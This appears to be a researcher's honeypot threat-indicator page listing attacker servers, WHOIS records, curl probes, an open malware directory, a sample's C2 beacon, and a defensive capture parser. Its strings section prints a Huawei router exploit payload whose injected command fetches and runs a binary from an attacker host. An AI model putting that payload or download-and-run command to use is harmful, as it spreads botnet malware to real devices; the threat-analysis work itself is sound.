Ukrainian Honeypot ::008:: Threat Indicators // Beacon Servers (2023 Edition)

Random servers/malware located, and general notes.

Last Updated

Tue Aug 29 22:03:49 2023

See Also

(all are still regularly updated as of roughly the above date; I apologize for any organizational issues and the raw nature of this data, there’s a lot to manage and a lot coming in while still trying to analyze manually to a certain degree while monitoring services; I also have a disorganized mess of a mind)

https://bcable.net/analysis-ukr-prelim.html

https://bcable.net/analysis-ukr-graphs.html

https://bcable.net/analysis-ukr-indicators.html

https://bcable.net/analysis-ukr-ru_map_sessions.html

https://bcable.net/analysis-ukr-cn_map_sessions.html

https://bcable.net/analysis-ukr-miori_fail.html

https://bcable.net/analysis-ukr-botnet_perl.html

https://bcable.net/analysis-ukr-ddos_gh0st.html

https://bcable.net/analysis-ukr-indicators_2023.html

https://bcable.net/analysis-ukr-crew_001.html

https://bcable.net/analysis-ukr-inventory_attack.html

https://bcable.net/analysis-ukr-crew_002.html

Libraries

library(openssl)
## Linking to: OpenSSL 3.0.8 7 Feb 2023

ClamAV Scan Results

# ClamAV verdicts for the collected samples, keyed by SHA256
clamscan_hashes <- read.csv("../graphs/clamscan_hashes.csv")
# Hash every captured sample (recursively) so it can be joined to the scan results
malware_files <- list.files("redacted/malware", recursive=TRUE)
malware_table <- sapply(malware_files, FUN=function(x){
	as.character(sha256(file(paste0("redacted/malware/", x))))
})
malware_sha256 <- data.frame(
	Hash.SHA256=as.vector(malware_table),
	File.Name=names(malware_table)
)
# Inner join on the hash: only files that ClamAV has a verdict for are kept
malware_df <- merge(malware_sha256, clamscan_hashes, by="Hash.SHA256")
write.csv(malware_df, "malware_scans.csv", row.names=FALSE)

Manual Explorations

34.133.16.87

NetRange:       34.128.0.0 - 34.191.255.255
CIDR:           34.128.0.0/10
NetName:        GOOGL-2
NetHandle:      NET-34-128-0-0-1
Parent:         NET34 (NET-34-0-0-0-0)
NetType:        Direct Allocation
OriginAS:
Organization:   Google LLC (GOOGL-2)
RegDate:        2021-01-08
Updated:        2021-01-08
Ref:            https://rdap.arin.net/registry/ip/34.128.0.0
OrgName:        Google LLC
OrgId:          GOOGL-2
Address:        1600 Amphitheatre Parkway
City:           Mountain View
StateProv:      CA
PostalCode:     94043
Country:        US
RegDate:        2006-09-29
Updated:        2019-11-01
Comment:        *** The IP addresses under this Org-ID are in use by Google Cloud customers ***
$ curl -i http://34.133.16.87/
HTTP/1.1 200 OK
Date: Mon, 09 Jan 2023 17:58:40 GMT
Server: Apache/2.4.53 (CentOS Stream)
Last-Modified: Thu, 05 Jan 2023 20:01:45 GMT
ETag: "0-5f189c54138f6"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://34.133.16.87/x0ox0ox0oxDefault/
HTTP/1.1 200 OK
Date: Mon, 09 Jan 2023 17:59:08 GMT
Server: Apache/2.4.53 (CentOS Stream)
Last-Modified: Thu, 05 Jan 2023 20:01:45 GMT
ETag: "0-5f189c54144ae"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8

193.47.61.42

Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
inetnum:        193.47.61.0 - 193.47.61.255
netname:        Serverion_BV-NET
org:            ORG-DCB8-RIPE
abuse-c:        SB27731-RIPE
country:        NL
admin-c:        SB27731-RIPE
tech-c:         SB27731-RIPE
mnt-domains:    mnt-nl-descapital-1
mnt-lower:      mnt-nl-descapital-1
mnt-routes:     mnt-nl-descapital-1
status:         ASSIGNED PA
mnt-by:         MNT-NETERRA
created:        2022-04-21T14:04:14Z
last-modified:  2022-09-26T14:13:37Z
source:         RIPE
$ curl -i http://193.47.61.42
HTTP/1.1 200 OK
Date: Mon, 09 Jan 2023 18:09:49 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 29 Dec 2022 02:24:05 GMT
ETag: "0-5f0ee2dd791b5"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/
HTTP/1.1 200 OK
Date: Mon, 09 Jan 2023 18:10:13 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 29 Dec 2022 02:24:05 GMT
ETag: "0-5f0ee2dd7a925"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8

45.81.39.72

inetnum:        45.81.39.0 - 45.81.39.255
netname:        SERVERION_BV-NET
org:            ORG-DCB8-RIPE
country:        NL
admin-c:        SB27731-RIPE
tech-c:         SB27731-RIPE
mnt-domains:    mnt-nl-descapital-1
mnt-lower:      mnt-nl-descapital-1
mnt-routes:     mnt-nl-descapital-1
status:         ASSIGNED PA
mnt-by:         MNT-NETERRA
created:        2022-12-13T14:35:09Z
last-modified:  2022-12-13T14:35:09Z
source:         RIPE
$ curl -i http://45.81.39.72/
HTTP/1.1 200 OK
Date: Mon, 09 Jan 2023 18:18:16 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Wed, 28 Dec 2022 07:32:31 GMT
ETag: "8-5f0de5f0d950c"
Accept-Ranges: bytes
Content-Length: 8
Content-Type: text/html; charset=UTF-8

i love u

Interesting strings:

SNQUERY: 127.0.0.1:AAAAAA:xsvr
M-SEARCH * HTTP/1.1
HOST: 255.255.255.255:1900
MAN: "ssdp:discover"
ST: urn:dial-multiscreen-org:service:dial:1
USER-AGENT: Google Chrome/60.0.3112.90 Windows
objectClass0
service:service-agent
        _services
        TeamSpeak
Windows XP
HTTP/1.1 404 Not Found
Server: Apache
Content-Length:
HTTP/1.1 200 OK
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="ht
tp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPC
onnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.81.39.72 -l /tmp/.oxy -r /mips; /bin/busybox chmod 7
77 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>
</u:Upgrade></s:Body></s:Envelope>
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569
d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop
="auth", nc=00000001, cnonce="248d1a2560100669"
Content-Length:
 && mkdir
; chmod 777
bin/busybox
bin/watchdog
bin/systemd
/bin/busybox
/bin/watchdog
/bin/systemd
w5q6he3dbrsgmclkiu4to18npavj702f
GET /%s HTTP/1.0
User-Agent: Update v1.0
npxXoudifFeEgGaACScs

113.106.167.11

inetnum:        113.96.0.0 - 113.111.255.255
netname:        CHINANET-GD
descr:          CHINANET Guangdong province network
descr:          Data Communication Division
descr:          China Telecom
country:        CN
admin-c:        CH93-AP
tech-c:         IC83-AP
abuse-c:        AC1573-AP
status:         ALLOCATED PORTABLE
remarks:        service provider
remarks:        --------------------------------------------------------
remarks:        To report network abuse, please contact mnt-irt
remarks:        For troubleshooting, please contact tech-c and admin-c
remarks:        Report invalid contact via www.apnic.net/invalidcontact
remarks:        --------------------------------------------------------
mnt-by:         APNIC-HM
mnt-lower:      MAINT-CHINANET-GD
mnt-routes:     MAINT-CHINANET-GD
mnt-irt:        IRT-CHINANET-CN
last-modified:  2021-06-15T08:06:04Z
source:         APNIC
$ curl -i http://113.106.167.11/x/
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jan 2023 18:29:48 GMT
Content-Type: text/html
Content-Length: 0
Last-Modified: Mon, 05 Dec 2022 01:12:38 GMT
Connection: keep-alive
ETag: "638d4586-0"
Accept-Ranges: bytes
$ curl -i http://113.106.167.11/
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jan 2023 18:30:41 GMT
Content-Type: text/html
Content-Length: 2781
Last-Modified: Wed, 09 May 2018 14:03:22 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "5af2ffaa-add"
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>LNMP一键安装包 by Licess</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="author" content="Licess">
<meta name="keywords" content="lnmp,lnmp一键安装包,一键安装包">
<meta name="description" content="您已成功安装LNMP一键安装包!">
   恭喜您,LNMP一键安装包安装成功!
                                             LNMP一键安装包

LNMP一键安装包是一个用Linux Shell编写的可以为CentOS/RadHat/Fedora、Debian/Ubuntu/Raspbian/Deepin VPS或独
立主机安装LNMP(Nginx/MySQL/PHP)、LNMPA(Nginx/MySQL/PHP/Apache)、LAMP(Apache/MySQL/PHP)生产环境的Shell程序
。同时提供一些实用的辅助工具如:虚拟主机管理、FTP用户管理、Nginx、MySQL/MariaDB、PHP的升级、常用缓存组
件Redis、Xcache等的安装、重置MySQL root密码、502自动重启、日志切割、SSH防护DenyHosts/Fail2Ban、备份等许多
实用脚本。

   查看本地环境: 探针  phpinfo  phpMyAdmin(为了安全,建议将phpmyadmin目录重命名为不容易猜到的目录!)

   更多LNMP一键安装包信息请访问: https://lnmp.org

   LNMP一键安装包问题反馈请访问: https://bbs.vpser.net/forum-25-1.html

   VPS相关教程: https://www.vpser.net/vps-howto/

   美国VPS推荐: https://www.vpser.net/usa-vps/

 声明:出现该页面只说明您当前访问的网站使用了LNMP一键安装包搭建的环境,当前网站与LNMP一键安装包、VPS侦探
                                        和licess不存在任何关系!

                                   LNMP一键安装包 by Licess & VPS侦探

185.225.74.55

inetnum:        185.225.74.0 - 185.225.74.255
netname:        SERVERION_BV-NET
abuse-c:        SB27731-RIPE
org:            ORG-DCB8-RIPE
country:        NL
admin-c:        SB27731-RIPE
tech-c:         SB27731-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-NETERRA
mnt-routes:     mnt-nl-descapital-1
mnt-domains:    mnt-nl-descapital-1
mnt-lower:      mnt-nl-descapital-1
created:        2022-06-28T09:01:54Z
last-modified:  2022-09-26T14:44:21Z
source:         RIPE

organisation:   ORG-DCB8-RIPE
org-name:       Des Capital B.V.
country:        NL
org-type:       LIR
address:        Krammer 8
address:        3232HE
address:        Brielle
address:        NETHERLANDS
phone:          +31851308338
phone:          +13023803902
admin-c:        AA35882-RIPE
tech-c:         TA7409-RIPE
abuse-c:        AR60082-RIPE
mnt-ref:        mnt-nl-descapital-1
mnt-ref:        RELCOMGROUP-EXT-MNT
mnt-ref:        FREENET-MNT
mnt-ref:        MNT-NETERRA
mnt-ref:        MNT-MAYAK
mnt-ref:        bg-mcreative-1-mnt
mnt-ref:        mnt-bg-mconsulting15-1
mnt-ref:        bg-mconsulting-1-mnt
mnt-ref:        MNT-MCONSULTING
mnt-ref:        mnt-bg-ccomp-1
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         mnt-nl-descapital-1
created:        2020-03-17T15:00:52Z
last-modified:  2022-09-26T13:22:34Z
source:         RIPE # Filtered
mnt-ref:        AZERONLINE-MNT
mnt-ref:        interlir-mnt
$ curl -i http://185.225.74.55/
HTTP/1.1 200 OK
Date: Sun, 15 Jan 2023 19:57:18 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 10 Jan 2023 15:11:55 GMT
ETag: "8-5f1ea4df2d0fb"
Accept-Ranges: bytes
Content-Length: 8
Content-Type: text/html; charset=UTF-8

i love u

eth0.me

2023-01-24/httpd-[bcable-redacted]-80-90.151.171.108-18499-2023-01-24T18:31:24.067439-gSkr7x:stream = [('in', b'CONNECT eth0.me:443 HTTP/1.1\x0d\x0aHost: eth0.me:443\x0d\x0aProxy-Connection: keep-alive\x0d\x0aUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https://best-proxies.ru/faq/#from)\x0d\x0a\x0d\x0a'),
2023-01-24/httpd-[bcable-redacted]-80-90.151.171.108-59777-2023-01-24T18:31:24.242769-auiBR0:stream = [('in', b'GET http://eth0.me?Z71008541870Q1 HTTP/1.1\x0d\x0aHost: eth0.me\x0d\x0aCookie: Z71008541870Q1\x0d\x0aUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https://best-proxies.ru/faq/#from)\x0d\x0aReferer: https://google.com/\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0aContent-Length: 9\x0d\x0aConnection: close\x0d\x0a\x0d\x0apost=true\x0d\x0a\x0d\x0a'),
$ curl -i "http://eth0.me?Z71008541870Q1"
HTTP/1.1 200 OK
Server: nginx/1.22.0
Date: Wed, 25 Jan 2023 19:19:21 GMT
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive

X.X.X.X

Response was the IP of the VPN I was connected to at the time.

$ curl -i "http://eth0.me"
HTTP/1.1 200 OK
Server: nginx/1.22.0
Date: Wed, 25 Jan 2023 19:21:43 GMT
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive

X.X.X.X

Same, which means they could easily track the VPN IP to the honeypot query. Interesting tracking technique.
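Added example, not code from the original notes: a small Python parser for the stream-capture format shown above that flags proxied requests to an IP-echo service carrying a correlation token, which is the tracking behaviour observed with eth0.me. The sample lines are constructed (TEST-NET source addresses); only the eth0.me host and the Z71008541870Q1 token come from the capture.

```python
import ast
import re
from urllib.parse import urlsplit

# IP-echo services an attacker can use to learn the proxy's egress address.
# eth0.me is the one seen in this capture; extend the set as more are observed.
IP_ECHO_HOSTS = {"eth0.me"}

# Constructed sample lines in the honeypot's capture format: a session id,
# then the inbound request as a Python bytes literal. Source IPs are TEST-NET.
SAMPLE_STREAMS = [
    r"2023-01-24/httpd-[redacted]-80-203.0.113.5-18499-gSkr7x:stream = [('in', "
    r"b'CONNECT eth0.me:443 HTTP/1.1\x0d\x0aHost: eth0.me:443\x0d\x0a"
    r"Proxy-Connection: keep-alive\x0d\x0a\x0d\x0a'),",
    r"2023-01-24/httpd-[redacted]-80-203.0.113.5-59777-auiBR0:stream = [('in', "
    r"b'GET http://eth0.me?Z71008541870Q1 HTTP/1.1\x0d\x0aHost: eth0.me\x0d\x0a"
    r"Cookie: Z71008541870Q1\x0d\x0aReferer: https://google.com/\x0d\x0a"
    r"Connection: close\x0d\x0a\x0d\x0apost=true\x0d\x0a'),",
    r"2023-01-24/httpd-[redacted]-80-203.0.113.9-41002-k3Hd1q:stream = [('in', "
    r"b'GET http://example.org/ HTTP/1.1\x0d\x0aHost: example.org\x0d\x0a\x0d\x0a'),",
]

# The inbound side of a session is stored as ('in', b'...'); grab the literal.
STREAM_RE = re.compile(r"\('in', (b'.*?')\)")


def parse_stream_line(line):
    """Return the decoded inbound request bytes from one capture line, or None."""
    m = STREAM_RE.search(line)
    if not m:
        return None
    # literal_eval turns the b'...\x0d\x0a...' text back into real bytes
    return ast.literal_eval(m.group(1))


def parse_request(raw):
    """Split raw HTTP request bytes into (method, target, lower-cased headers)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for h in header_lines:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify(raw):
    """Flag a proxied request that uses the honeypot to learn its egress IP.

    Returns None for unrelated traffic, otherwise a dict describing the hit:
    the echo host, whether a query-string token was attached, and whether the
    same token was echoed in the Cookie header (the pattern seen above).
    """
    method, target, headers = parse_request(raw)
    if method == "CONNECT":
        host = target.rsplit(":", 1)[0]
        token = None
    else:
        parts = urlsplit(target)
        host = parts.hostname or headers.get("host", "").split(":")[0]
        token = parts.query or None
    if host not in IP_ECHO_HOSTS:
        return None
    cookie = headers.get("cookie")
    return {
        "host": host,
        "method": method,
        "token": token,
        "token_in_cookie": bool(token) and cookie == token,
        "user_agent": headers.get("user-agent", ""),
    }


def scan(lines):
    """Run classify() over a batch of capture lines and collect the hits."""
    hits = []
    for line in lines:
        raw = parse_stream_line(line)
        if raw is None:
            continue
        verdict = classify(raw)
        if verdict:
            hits.append(verdict)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_STREAMS):
        print(hit)
```

A token that is both the query string and the Cookie value is the correlation key: the attacker's side logs which token it sent through which proxy, and the echo service's reply ties that token to the proxy's real egress address.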

45.12.253.180

inetnum:        45.12.253.0 - 45.12.253.255
netname:        SERVERION_BV-NET
org:            ORG-DCB8-RIPE
country:        NL
admin-c:        SB27731-RIPE
tech-c:         SB27731-RIPE
mnt-domains:    mnt-nl-descapital-1
mnt-lower:      mnt-nl-descapital-1
mnt-routes:     mnt-nl-descapital-1
status:         ASSIGNED PA
mnt-by:         MNT-NETERRA
created:        2022-12-13T14:35:09Z
last-modified:  2022-12-13T14:35:09Z
source:         RIPE

organisation:   ORG-DCB8-RIPE
org-name:       Des Capital B.V.
country:        NL
org-type:       LIR
address:        Krammer 8
address:        3232HE
address:        Brielle
address:        NETHERLANDS
phone:          +31851308338
phone:          +13023803902
admin-c:        AA35882-RIPE
tech-c:         TA7409-RIPE
abuse-c:        AR60082-RIPE
mnt-ref:        mnt-nl-descapital-1
mnt-ref:        RELCOMGROUP-EXT-MNT
mnt-ref:        FREENET-MNT
mnt-ref:        MNT-NETERRA
mnt-ref:        MNT-MAYAK
mnt-ref:        bg-mcreative-1-mnt
mnt-ref:        mnt-bg-mconsulting15-1
mnt-ref:        bg-mconsulting-1-mnt
mnt-ref:        MNT-MCONSULTING
mnt-ref:        mnt-bg-ccomp-1
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         mnt-nl-descapital-1
created:        2020-03-17T15:00:52Z
last-modified:  2022-09-26T13:22:34Z
source:         RIPE # Filtered
mnt-ref:        AZERONLINE-MNT
mnt-ref:        interlir-mnt
$ curl -i http://45.12.253.180/
HTTP/1.1 200 OK
Date: Wed, 25 Jan 2023 19:38:58 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Sat, 21 Jan 2023 01:05:52 GMT
ETag: "0-5f2bbc4725a49"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Index of /a

   [ICO]             Name            Last modified   Size Description
═════════════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                            -  
[   ]       76d32be0.sh             2023-01-20 20:27 4.3K  
[   ]       883dremos.sh            2023-01-21 18:44 1.5K  
[   ]       77676d32be0.sh          2023-01-21 16:09 3.9K  
[DIR]       b/                      2023-01-21 19:41    -  
[   ]       bin                     2023-01-20 20:30 4.3K  
[   ]       bins.sh                 2023-01-20 20:27 4.3K  
[   ]       bot.arc                 2023-01-20 20:32  81K  
[   ]       bot.arm                 2023-01-20 20:32  33K  
[   ]       bot.arm5                2023-01-20 20:32  29K  
[   ]       bot.arm7                2023-01-20 20:32  57K  
[   ]       bot.i686                2023-01-20 20:32  34K  
[   ]       bot.m68k                2023-01-20 20:32  78K  
[   ]       bot.mips                2023-01-20 20:32  34K  
[   ]       bot.mpsl                2023-01-20 20:32  35K  
[   ]       bot.ppc                 2023-01-20 20:32  31K  
[   ]       bot.sh4                 2023-01-20 20:32  73K  
[   ]       bot.spc                 2023-01-20 20:32  81K  
[   ]       bot.x86                 2023-01-20 20:32  32K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  81K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  33K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  29K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  37K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  57K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  34K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  78K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  34K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  35K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  31K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  73K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  81K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  32K  
[   ]       wget.sh                 2023-01-20 20:27 4.3K  
[   ]       wwgget.sh               2023-01-21 01:26 3.9K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  81K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  33K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  29K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  37K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  57K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  34K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  78K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  34K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  35K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  31K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  73K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  81K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  32K  
═════════════════════════════════════════════════════════════════════
Index of /a/b

   [ICO]             Name            Last modified   Size Description
═════════════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                            -  
[   ]       76d32be0.sh             2023-01-20 20:27 4.3K  
[   ]       883dremos.sh            2023-01-21 18:44 1.5K  
[   ]       77676d32be0.sh          2023-01-21 16:10 3.9K  
[   ]       bin                     2023-01-20 20:30 4.3K  
[   ]       bins.sh                 2023-01-20 20:27 4.3K  
[   ]       bot.arc                 2023-01-20 20:31  81K  
[   ]       bot.arm                 2023-01-20 20:31  33K  
[   ]       bot.arm5                2023-01-20 20:31  29K  
[   ]       bot.arm7                2023-01-20 20:31  57K  
[   ]       bot.i686                2023-01-20 20:31  34K  
[   ]       bot.m68k                2023-01-20 20:31  78K  
[   ]       bot.mips                2023-01-20 20:31  34K  
[   ]       bot.mpsl                2023-01-20 20:31  35K  
[   ]       bot.ppc                 2023-01-20 20:31  31K  
[   ]       bot.sh4                 2023-01-20 20:31  73K  
[   ]       bot.spc                 2023-01-20 20:31  81K  
[   ]       bot.x86                 2023-01-20 20:31  32K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  81K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  33K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  29K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  37K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  57K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  34K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  78K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  34K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  35K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  31K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  73K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  81K  
[   ]       db0fa4b8db0333367e9b..> 2023-01-20 20:33  32K  
[   ]       wget.sh                 2023-01-20 20:27 4.3K  
[   ]       wwgget.sh               2023-01-21 16:07 3.9K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  81K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  33K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  29K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  37K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  57K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  34K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  78K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  34K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  35K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  31K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  73K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  81K  
[   ]       x3x38db0fa4b8db03333..> 2023-01-20 20:35  32K  
═════════════════════════════════════════════════════════════════════

175.178.77.241:4543

inetnum:        175.178.0.0 - 175.178.255.255
netname:        TencentCloud
descr:          Tencent cloud computing (Beijing) Co., Ltd.
descr:          Floor 6, Yinke Building,38 Haidian St,Haidian District Beijing
country:        CN
admin-c:        JT1125-AP
tech-c:         JX1747-AP
abuse-c:        AC1601-AP
status:         ALLOCATED PORTABLE
mnt-by:         MAINT-CNNIC-AP
mnt-lower:      MAINT-CNNIC-AP
mnt-routes:     MAINT-CNNIC-AP
mnt-irt:        IRT-CNNIC-CN
last-modified:  2021-06-16T01:25:53Z
source:         APNIC

irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
auth:           # Filtered
remarks:        Please note that CNNIC is not an ISP and is not
remarks:        empowered to investigate complaints of network abuse.
remarks:        Please contact the tech-c or admin-c of the network.
mnt-by:         MAINT-CNNIC-AP
last-modified:  2021-06-16T01:39:57Z
source:         APNIC
HTTP File Server (HFS) listing on port 4543, UI widgets stripped:

0 folders, 2 files, 2.0 MB
dwer.exe    2023/1/25 19:34    1.4 MB
kaf         2023/1/17 3:35     525.6 KB
Uptime: 08:46:01
$ file *
dwer.exe: PE32 executable (GUI) Intel 80386, for MS Windows
kaf:      ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, stripped
$ clamscan *
175.178.77.241/4543/dwer.exe: OK
175.178.77.241/4543/kaf: OK

----------- SCAN SUMMARY -----------
Known viruses: 8650323
Engine version: 0.103.7
Scanned directories: 0
Scanned files: 2
Infected files: 0
Data scanned: 2.08 MB
Data read: 1.96 MB (ratio 1.06:1)
Time: 17.927 sec (0 m 17 s)
Start Date: 2023:01:25 13:50:48
End Date:   2023:01:25 13:51:06

YEAH RIGHT… time to do some simple analysis on some of this: strings, maybe some deliberate infection of kaf

GET %s HTTP/1.1
Host: %s
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)
Referer: http://%s%s
Pragma: no-cache
DNT: 1
Connection: Keep-Alive
GET %s HTTP/1.1
Host: %s
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
User-Agent:Mozilla/5.0 (compatible;+Googlebot/2.1;++http://www.google.com/bot.html)
Referer: http://%s%s
Pragma: no-cache
DNT: 1
Connection: Keep-Alive

Seems to at least have code to appear as bot traffic.

$ cat contained_kaf.txt | grep DST= | sed -r "s/^.* DST=([^ ]+) .* DPT=([0-9]+) .*$/\1:\2/g" | sort | uniq -c
     58 45.145.230.230:6681

Very specific C2 server. No apparent DDoS chaff traffic to throw off the scent.

$ nmap -Pn -p 80,443,3389,6681,8080 45.145.230.230
Starting Nmap 7.70 ( https://nmap.org ) at 2023-01-25 15:07 CST
Nmap scan report for 45.145.230.230
Host is up (0.11s latency).

PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
3389/tcp open  ms-wbt-server
6681/tcp open  unknown
8080/tcp open  http-proxy

Open, or just all ports open because it has been blackholed or abandoned. It could also be used as its own tarpit, just to register who has been infected.

15:04 -!- Irssi: Looking up 45.145.230.230
15:04 -!- Irssi: Connecting to 45.145.230.230 [45.145.230.230] port 6681
15:04 -!- Irssi: Connection to 45.145.230.230 established
15:09 -!- Irssi: Connection lost to 45.145.230.230

Times out, so likely tarpit either by interception or by attacker’s choice.

107.189.31.181

NetRange:       107.189.0.0 - 107.189.31.255
CIDR:           107.189.0.0/19
NetName:        PONYNET-11
NetHandle:      NET-107-189-0-0-1
Parent:         NET107 (NET-107-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS53667
Organization:   FranTech Solutions (SYNDI-5)
RegDate:        2014-04-17
Updated:        2014-04-17
Ref:            https://rdap.arin.net/registry/ip/107.189.0.0

OrgName:        FranTech Solutions
OrgId:          SYNDI-5
Address:        1621 Central Ave
City:           Cheyenne
StateProv:      WY
PostalCode:     82001
Country:        US
RegDate:        2010-07-21
Updated:        2017-01-28
Ref:            https://rdap.arin.net/registry/entity/SYNDI-5

OrgAbuseHandle: FDI19-ARIN
OrgAbuseName:   Dias, Francisco
OrgAbusePhone:  +1-778-977-8246
OrgAbuseEmail:  fdias@frantech.ca
OrgAbuseRef:    https://rdap.arin.net/registry/entity/FDI19-ARIN

OrgTechHandle: FDI19-ARIN
OrgTechName:   Dias, Francisco
OrgTechPhone:  +1-778-977-8246
OrgTechEmail:  fdias@frantech.ca
OrgTechRef:    https://rdap.arin.net/registry/entity/FDI19-ARIN
$ curl -i http://107.189.31.181
HTTP/1.1 200 OK
Date: Fri, 03 Feb 2023 18:49:46 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 26 Jan 2023 12:41:38 GMT
ETag: "0-5f32a11ecc5d3"
Accept-Ranges: bytes
Content-Length: 0
